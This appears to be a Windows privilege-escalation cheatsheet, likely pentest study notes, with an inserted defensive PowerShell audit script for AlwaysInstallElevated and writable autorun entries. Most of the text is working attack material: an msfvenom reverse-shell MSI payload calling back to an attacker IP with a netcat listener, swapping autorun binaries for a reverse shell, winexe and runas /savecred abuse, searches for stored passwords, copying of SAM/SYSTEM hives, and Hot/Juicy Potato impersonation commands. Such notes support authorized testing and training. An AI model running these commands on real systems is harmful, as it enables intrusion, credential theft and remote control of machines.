Windows
Check user (whoami) and groups (net user <username>)
Run winPEAS with fast, searchfast, and cmd options.
Run Seatbelt & other script as well (PowerUP.ps1, SharpUp, etc)
If your scripts are failing and you don't know why, you can always run the manual commands from this source, and other Windows PrivEsc cheatsheets
Strategy:
Spend some time and read over the result of your enumeration.
If WinPEAS or another tool finds something interesting, make a note of it.
Avoid rabbit holes by creating a checklist of the things you need for a given privilege escalation method to work.
Have a quick look around for files on the user's desktop and in other common locations (e.g. C:\ and C:\Program Files). Read through any interesting files you find, as they may contain information that helps escalate privileges.
If you still don't have an admin shell, re-read your full enumeration dumps and highlight anything that seems odd. This might be a process or file name you aren't familiar with or even a username.
At this stage you can also start to think about Kernel Exploit.
Registry Exploits
AutoRuns -->
.\winPEASany.exe quiet applicationinfo
search for Autorun Applications (T1010)
check FilePerms: Everyone
ability to restart
AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
must be set to 1.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
must be set to 1.
AutoRuns
Replace Program.exe with reverseShell.exe, then restart the computer so the application runs in the
manual check:
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# check the directory permission
.\accesschk.exe /accepteula -wvu "<directory>"
AlwaysInstallElevated
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.x.y LPORT=53 -f msi -o reverse.msi
# nc -lvnp 53
execute the reverse shell:
msiexec /quiet /qn /i reverse.msi
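As an added defender-side check that is not part of these notes, the following PowerShell script audits the two registry conditions above: whether AlwaysInstallElevated is 1 in both hives (it only matters when both are), and whether any HKLM Run entry points at an executable or directory that Everyone or Users can modify. The function names and the list of "weak" principals are my own choices.

```powershell
# Added audit script, not part of the original cheatsheet. Assumes Windows
# PowerShell 5.1 or later on the host being audited; runs as a normal user.

function Test-AlwaysInstallElevated {
    $keys = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
            'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    $values = foreach ($k in $keys) {
        # A missing key or value means the policy is not set, so treat it as 0
        $v = (Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        if ($null -eq $v) { 0 } else { [int]$v }
    }
    # The Installer only honours the policy when BOTH hives are set to 1
    [pscustomobject]@{
        HKLM          = $values[0]
        HKCU          = $values[1]
        Misconfigured = ($values[0] -eq 1 -and $values[1] -eq 1)
    }
}

function Get-WritableAutorun {
    # For each HKLM Run entry, resolve the executable and report ACEs that let
    # low-privilege principals modify the file or its directory.
    $runKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    $weak   = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users'
    $meta   = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
    $entries = Get-ItemProperty -Path $runKey -ErrorAction SilentlyContinue
    foreach ($name in $entries.PSObject.Properties.Name) {
        if ($meta -contains $name) { continue }
        $cmd = [Environment]::ExpandEnvironmentVariables($entries.$name)
        # Quoted path, otherwise the first whitespace-delimited token
        $exe = if ($cmd -match '^"([^"]+)"') { $Matches[1] } else { ($cmd -split '\s+')[0] }
        if (-not (Test-Path -LiteralPath $exe)) { continue }
        foreach ($target in $exe, (Split-Path -Parent $exe)) {
            foreach ($ace in (Get-Acl -LiteralPath $target).Access) {
                if ($ace.AccessControlType -eq 'Allow' -and
                    $weak -contains $ace.IdentityReference.Value -and
                    "$($ace.FileSystemRights)" -match 'Write|Modify|FullControl') {
                    [pscustomobject]@{
                        Entry = $name; Target = $target
                        Principal = $ace.IdentityReference.Value; Rights = $ace.FileSystemRights
                    }
                }
            }
        }
    }
}

Test-AlwaysInstallElevated
Get-WritableAutorun | Format-Table -AutoSize
```

Any row returned by Get-WritableAutorun is a finding to remediate by tightening the ACL on that file or directory; Misconfigured = True means the policy should be set back to 0 in both hives.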
Service Exploits
Passwords
.\winPEASany.exe quiet filesinfo userinfo
-> search for AutoLogon credentials (T1012)
log in as another user on Windows:
winexe -U 'admin%password123' //<target ip address> cmd.exe
# nt authority
winexe -U 'admin%password123' --system //<target ip address> cmd.exe
SaveCred
cmdkey /list
# exploit
runas /savecred /user:admin C:\Windows\Tasks\rev.exe
Password in Configuration
.\winPEASany.exe quiet cmd searchfast filesinfo
search for --> possible known files that can contain creds (T1083 & T1081)
or use this cmd command to find the creds:
dir /s *pass* == *.config
find /si password *.xml *.ini *.txt
SAM/SYSTEM Locations
file location:
dir c:\windows\system32\config
dir c:\windows\repair
dir c:\windows\system32\config\regback
or use winPEAS
.\winPEASany.exe quiet cmd searchfast filesinfo
search for --> possible known files that can contain creds (T1083 & T1081)
Copy the SAM and SYSTEM files to Kali Linux.
Scheduled Tasks
Insecure GUI Apps
Startup Apps
Installed Apps
Hot Potato
Windows 7,8,10, Server 2008, Server 2012
.\potato.exe -p 10.10.x.y -cmd "C:\Windows\Tasks\rev.exe" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true
https://github.com/foxglovesec/Potato/tree/master/source/Potato/Potato/bin/Release
Juicy Potato
usually a service account
whoami /priv
-> SeImpersonatePrivilege Enabled
# .\Juicypotato.exe -l
.\JuicyPotato.exe -l 1337 -p C:\Windows\Tasks\rev.exe -t * -c <CLSID>
https://github.com/ohpe/juicy-potato https://jlajara.gitlab.io/Potatoes_Windows_Privesc
Port Forwarding
Kernel Exploits